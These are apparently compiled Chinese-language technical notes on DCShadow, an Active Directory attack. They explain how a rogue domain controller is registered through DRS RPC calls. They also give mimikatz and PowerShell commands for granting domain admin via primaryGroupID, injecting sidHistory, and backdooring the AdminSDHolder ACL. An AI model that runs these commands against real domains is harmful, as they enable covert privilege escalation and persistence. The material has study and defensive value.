参考、摘抄于:

https://blog.riskivy.com/dcshadow/#DCShadow-2

DCShadow explained: A technical deep dive into the latest AD attack technique

DCShadow - Silently turn off Active Directory Auditing

DCShadow - Minimal permissions, Active Directory Deception, Shadowception and more

https://zhuanlan.zhihu.com/p/37782341

DCshadow不是一种提权手法,而是拿到域控权限后用于权限维持的技术;相比于DCsync,它能直接修改AD中对象的属性,尽管DCsync+Pass the hash也能修改AD对象属性,但没有DCShadow快速、隐蔽。

基础概念

nTDSDSA对象

在活动目录数据库中通过一些特殊对象以及一定的数据对象层级关系来标识某台机器是域控制器,其中,最关键的是nTDSDSA对象,该对象正是标识一台主机是域控角色的特殊对象。同时,nTDSDSA对象需要位于正确的位置,根据文档其父对象应该是一个server对象,server对象有一个属性serverReference,它的值正是链接到的域控computer对象。

【Windows域】DCShadow - 图1

【Windows域】DCShadow - 图2

为了注册成域控,需要插入server对象和nTDSDSA对象,server对象可以通过LDAP的add操作进行插入,nTDSDSA对象却无法通过LDAP操作进行添加,需要通过RPC调用添加。 查看CN=Servers的权限设置,可以看到需要域控权限才能增加、修改server对象。

【Windows域】DCShadow - 图3

Kerberos SPN

SPN,即Service Principal Name,客户端通过Kerberos请求使用某种服务时,会在请求中附带上需要访问的服务的SPN名称,如文件共享服务cifs/DNS_DOMAIN_NAME,目录访问服务ldap/DNS_DOMAIN_NAME。KDC(密钥分发中心)将通过SPN来确定客户端请求访问的是主机上的哪个具体服务,因为一个主机上通常情况下同时提供多种支持Kerberos认证的服务,随后,KDC将使用该服务账号的密码哈希来对票据进行加密。 一般格式长这样: 
  1. service_class/hostname_or_FQDN
  2. service_class/hostname_or_FQDN:port
  3. service_class/hostname_or_FQDN:port/arbitrary_name
一个主机作为域控角色,使用Directory Replication Service (DRS)服务与域内其他域控进行数据同步,关于DRS服务需要使用的SPN,可参考[MS-DRSR]:

【Windows域】DCShadow - 图4

简而言之,在域控间进行数据同步时,有两种可能存在的情况:
  • 连接域内指定的域控,这种情况下,SPN形式为//,DRS interface GUID是一个固定的数值,为E3514235-4B06-11D1-AB04-00C04FC2DCD2,DSA GUID是nTDSDSA对象的objectGUID属性值,由于nTDSDSA对象无法直接通过LDAP操作插入,而DSA GUID(objectGUID属性值)依赖于nTDSDSA对象,因此该SPN同样不能直接通过LDAP进行插入。
  • 连接域林中的GC服务器,GC服务器(Global Catalog Server)是全局编录服务器,可以理解为一种服务或角色,用于存储本域所有对象信息和林中其他域部分对象信息,这种情况下,SPN形式为GC//,可以直接通过LDAP操作为属性插入新值。
因此,DCShadow伪装的域控想要与其他域控进行数据同步复制,就需要提供以上两种情况的SPN名称。

【Windows域】DCShadow - 图5

攻击过程

  1. # 窗口1 注册本机为域控,等待真实域控连接
  2. 1. 需要以system权限启动mimikatzsystem权限下用户名是win10-pc$,只有机器账号才能作为域控
  3. - 方法1psexec启动mimikatz
  4. - 方法2mimikatz自己获取system令牌
  5.     !+
  6.   !processtoken
  7. 2. lsadump::dcshadow /object:CN=win10,CN=Users,DC=ring2,DC=com /attribute:description /value:"helloworld"
  9. # 窗口2,以域管理员账户启动mimikatz,用于插入数据伪造DC,并强制发起域内同步
  10. PsExec64.exe -u ring2\administrator -p Test1234 c:\Users\win10\Desktop\mimikatz.exe
  11. token::whoami
  12. lsadump::dcshadow /push
一方面,mimikatz要往AD中插入数据以伪造一个域控,以及向真实域控发出同步请求,需要调用以下drsuapi接口:

【Windows域】DCShadow - 图6

  • IDL_DRSBind/IDL_DRSUnbind:drsuapi接口方法调用需要先进行Bind操作。
  • IDL_DRSAddEntry:添加/修改一个或多个数据对象,该方法的一个关键作用是,可以为server对象添加nTDSDSA对象,前面讲到nTDSDSA对象无法通过LDAP操作添加,此处,mimikatz通过对IDL_DRSAddEntry方法的调用来实现插入nTDSDSA对象,使该台主机成为域控角色。
  • IDL_DRSReplicaAdd:为指定的NC添加数据同步引用源(respFrom变量),客户端调用该方法,通知服务端当前有数据需要进行同步,应立即根据respFrom变量的值发起数据同步复制,该方法的调用实际上就是push指令触发注入恶意数据对象背后的操作。
  • IDL_DRSGetNCChanges:服务端在接收到客户端调用IDL_DRSReplicaAdd方法后,开始数据同步过程,根据respFrom变量指定的数据同步源,服务端向其发起连接并调用其IDL_DRSGetNCChanges方法,需要同步的数据将被封装在调用请求的响应中返回。
  • IDL_DRSReplicaDel:与Add相反,移除数据同步引用源。
另一方面,真实域控找伪造域控同步数据,需要提供绑定、数据同步等接口,因此mimikatz也实现了以下API用于提供DRS 服务:

【Windows域】DCShadow - 图7

1.注册

【Windows域】DCShadow - 图8

LDAP操作目录数据库,用于新建server对象以及增加GC SPN。

(下面的包是一次完成/push抓到的,如果代码中每步getchar暂停,抓到的LDAP包有问题。。。)【Windows域】DCShadow - 图9 ## 调用DRSAddEntry 用于新建nTDSDSA对象及DRS SPN【Windows域】DCShadow - 图10 【Windows域】DCShadow - 图11 【Windows域】DCShadow - 图12 ## 2. 推送 【Windows域】DCShadow - 图13 ### 调用DRSReplicaAdd 向真实域控发起drsuapi接口IDL_DRSReplicaAdd方法的调用,KCC默认15分钟进行域控间活动目录数据库同步,调用该方法实际上等于手动触发了数据同步,告知真实域控有需要立即进行同步的数据。【Windows域】DCShadow - 图14 + IDL_DRSReplicaDel 【Windows域】DCShadow - 图15 【Windows域】DCShadow - 图16 ## 3. 注销 ### 【Windows域】DCShadow - 图17 【Windows域】DCShadow - 图18 【Windows域】DCShadow - 图19 【Windows域】DCShadow - 图20 ## process summary 【Windows域】DCShadow - 图21 [ ](http:_www.labofapenetrationtester.com_2018_04_dcshadow)

利用

为普通用户添加域管权限

  1. // 将普通用户加入Domain Admins组
  2. lsadump::dcshadow /object:CN=win10,CN=Users,DC=ring2,DC=com /attribute:primarygroupid/value:512
  4. // sidhistory设为域管administartor的sid
  5. lsadump::dcshadow /object:CN=win10,CN=Users,DC=ring2,DC=com /attribute:sidhistory /value:S-1-5-21-1900941692-2128706383-2830697502-500
  8. 执行域复制:
  9. lsadump::dcshadow /push

使用sidhistory提权横移到其他域

https://stealthbits.com/blog/privilege-escalation-with-dcshadow/

Once an attacker has administrative rights over one domain, it is possible to spread to trusted domains/forests. It is important to look for the options related to SID Filtering. If SID Filtering is enabled, than historical SIDs cannot be used to access the forest on the other side of the trust. However, if it is disabled than we are in business. Many times this option is left disabled after migrations to ensure users don’t lose access to any systems and data they need.

Get-NetDomainTrust | ForEach-Object{Get-ADTrust –filter * -server $_.TargetName}

【Windows域】DCShadow - 图22

  1. lsadump::dcshadow /object:"CN=Jeff Warren,OU=Administrators,OU=Users,OU=JEFFLAB,DC=JEFFLAB,DC=local" /attribute:sidhistory /value:S-1-5-21-1722627474-2472677011-3296483304-1113
  3. Get-ADUser Jeff -Properties SIDHistory
添加SIDHistory后,即可对新域做DCsync

【Windows域】DCShadow - 图23

添加AdminSDHolder后门

AdminSDHolder ACL存储在nTSecurityDescriptor属性中,通过DCshadow修改此属性,以维持域内权限。相比于直接使用Domaind Admins账户,隐蔽性更高。

【Windows域】DCShadow - 图24

获取当前AdminSDHolder ACL

  1. $AdminSDHolder = [adsi]'LDAP://CN=AdminSDHolder,CN=System,DC=ring2,DC=com'
  2. $SDDL = $AdminSDHolder.ObjectSecurity.Sddl

修改AdminSDHolder ACL

  1. $UserToAdd = [adsi]'LDAP://CN=WIN10,CN=Users,DC=ring2,DC=com'
  2. $UserSid  = New-Object System.Security.Principal.SecurityIdentifier($UserToAdd.objectSid[0], 0) 
  3. $NewSDDL = $SDDL + "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;" + $UserSid.Value + ")"

使用DCShadow推送修改

  1. .mimikatz.exe "lsadump::dcshadow /object:CN=AdminSDHolder,CN=System,DC=ring2,DC=com /attribute:ntsecuritydescriptor /value:[NEW SDDL FROM ABOVE]”

原文

【Windows域】DCShadow笔记整理